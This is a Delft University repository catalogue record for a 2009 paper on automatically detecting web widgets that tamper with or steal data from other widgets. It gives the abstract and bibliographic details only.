Print Email Facebook Twitter Automated Security Testing of Web Widget Interactions Title Automated Security Testing of Web Widget Interactions Author Bezemer, C.P. Mesbah, A. Van Deursen, A. Faculty Electrical Engineering, Mathematics and Computer Science Department Software Computer Technology Date 2009-12-31 Abstract This paper is a pre-print of: Cor-Paul Bezemer, Ali Mesbah, and Arie van Deursen. Automated Security Testing of Web Widget Interactions. In Proceedings of the 7th joint meeting of the European Software Engineering Conference and the ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE’09). Research Papers. ACM. 2009. We present a technique for automatically detecting security vulnerabilities in client-side self-contained components, called web widgets, that can co-exist independently on a single web page. In this paper we focus on two security scenarios, namely the case in which (1) a malicious widget changes the content (DOM) of another widget, and (2) a widget steals data from another widget and sends it to the server via an HTTP request. We propose a dynamic analysis approach for automatically executing the web application and analyzing the runtime changes in the user interface, as well as the outgoing HTTP calls, to detect inter-widget interaction violations. Our approach, implemented in a number of open source Atusa plugins, called Diva, requires no modification of application code, and has few false positives. We discuss the results of an empirical evaluation of the violation revealing capabilities, performance, and scalability of our approach, by means of two case studies, on the Exact Widget Framework and Pageflakes, a commercial, widely used widget framework. Subject web applicationssecurity testing To reference this document use: http://resolver.tudelft.nl/uuid:35415c1b-c661-4200-92cc-6f83ccd61808 Publisher Delft University of Technology, Software Engineering Research Group ISSN 1872-5392 Source Technical Report Series TUD-SERG-2009-011 Other version https://doi.org/10.1145/1595696.1595711 Part of collection Institutional Repository Document type report Rights (c) 2009 by the authors of this report. Software Engineering Research Group, Department of Software Technology, Faculty of Electrical Engineering, Mathematics and Computer Science, Delft University of Technology. All rights reserved. No part of this series may be reproduced in any form or by any means without prior written permission of the authors. Files PDF TUD-SERG-2009-011.pdf 317.37 KB Close viewer /islandora/object/uuid:35415c1b-c661-4200-92cc-6f83ccd61808/datastream/OBJ/view